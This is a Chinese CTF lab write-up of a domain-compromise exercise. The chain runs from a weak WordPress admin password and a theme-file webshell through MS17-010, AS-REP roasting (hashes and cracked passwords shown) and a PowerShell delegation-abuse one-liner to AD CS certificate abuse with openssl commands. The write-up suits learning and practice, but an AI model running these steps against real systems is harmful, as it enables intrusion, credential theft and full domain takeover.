Logo
Overview

渗透记录:春秋云镜 2022网鼎杯半决赛复盘

April 12, 2025
CTF 题解

用时:2h 30min?

入口机

两个端口,22显然不能用。(嗯看了下那个cve也不能打)

看看80

是wordpress。弱密码登录后台( admin/123456 )改主题。

我这里改的是twentytwentytwo的index.php

改完之后直接连antsword

拿到flag1

然后传stowaway上去,加个代理。然后继续扫 

172.22.15.13 XR-DC01
172.22.15.18 80 XR-CA ADCS
172.22.15.24 80,3306 XR-WIN08 MS17-010
172.22.15.26 本机
172.22.15.35 XR-0687

ms17_010

似乎是最简单的…?

连上,flag2拿下。

看了下有phpMyAdmin,能找到密码。root/root@#123

登上去,翻到了最喜欢的用户名列表。。

导出一下,并且导出用户名 

import re
lines = open("zdoosys_user.sql","r").readlines()
for line in lines:
    match = re.search(r'(\w+)@xiaorang.lab',line)
    if match:
        print(match.group(1))

跑一下有没有AS-REP Roasting 

$krb5asrep$23$lixiuying@XIAORANG.LAB:d67bd3cdb8f8263a2b627c568e9dec95$4a7891e13a5767dd0d3b3a2db1428e47471bb8d5784b2f60a90fe7cfbd87dcc10a3b86b46fa5f3917879e57934ea8a49f9fbeb2fa44c3b523fb407cf94a438c798d6bcbf6aefbed2b926f50be66e22a4f4ebaebdedc7c0ab36ad56dd1fe57e7e8f4691f0892c24b7bef19970cd2857d0c2bd4d89e084d0f5c0e785942e7d49f4c9cc2d428272833b3334b1c599844d19c32ee788bac5cfb44c1e0f06c42dbd837295a1629d3bfe4e499e8e7aca06c2a6b65a1d5ae36289bb3fb72953a5578a49b39075b15261bde6ff7a1cc4e38be5243e0aab38491b54e9114d95127acbf42d5ac4ec21ee5a230c8fc66b42
$krb5asrep$23$huachunmei@XIAORANG.LAB:934e6eca67a8e8959262f942a5183a70$cb92da4c4f6c2ce03212b1ad706601cc23fe1d014debb6ad292662f6b178e8359c1519f26816c6941035994b86dbb600f3b99be8afd7ddc7f62c3f00af739ce772f6e6e6276d526aa6a0d694fcf6f777d18bbe32ef60e6ba57730db822a23f35be18f813868fb7421fef9677c17582746eb6bb5d072952ca7fed18b6f1be52d484b420223c7290ed28fbcef54909ee90d18024c5bc2239d9ef21dc7b5bb0a506b972a8315d51473d79ac5a63eb051ebcbdb710d228047570cfa14c53db390ae29e49552b3ca10621f12f8fa5acd1fa6495dcb1630fddcd0a45dbcb5573df17744a51ec083f3571358eb18806

hashcat爆破一下。 

lixiuying:winniethepooh
huachunmei:1qaz2wsx

rdp连上去,也可以传个session。使用powerview.ps1,查看机器id

修改服务资源msDS-AllowedToActOnBehalfOfOtherIdentity属性 

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3745972894-1678056601-2622918667-1147)";$SDBytes = New-Object byte[] ($SD.BinaryLength);$SD.GetBinaryForm($SDBytes, 0);Get-DomainComputer XR-0687 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

创建票据,

连接:(这里要改一下host,不然连不上)

剩下有个dc和一个ca,和Magic Relay是一样的,

这是一个 Active Directory 域权限提升漏洞,通过滥用 Active Directory 证书服务 (AD CS) 来请求具有任意攻击者控制的 DNS 主机名的计算机证书,这可以使域中的任何计算机帐户模拟域控制器,从而实现完全的域接管。

添加账户

生成证书

分离 

openssl pkcs12 -in xr-dc01.pfx -nodes -out test.pem                                     6s Py base ☕ 1.8 06:14:17 下午
openssl rsa -in test.pem -out test.key
openssl x509 -in test.pem -out test.crt

使用passthecert生成凭据并登录

comment

留言 / 评论

如果暂时没有看到评论,请点击下方按钮重新加载。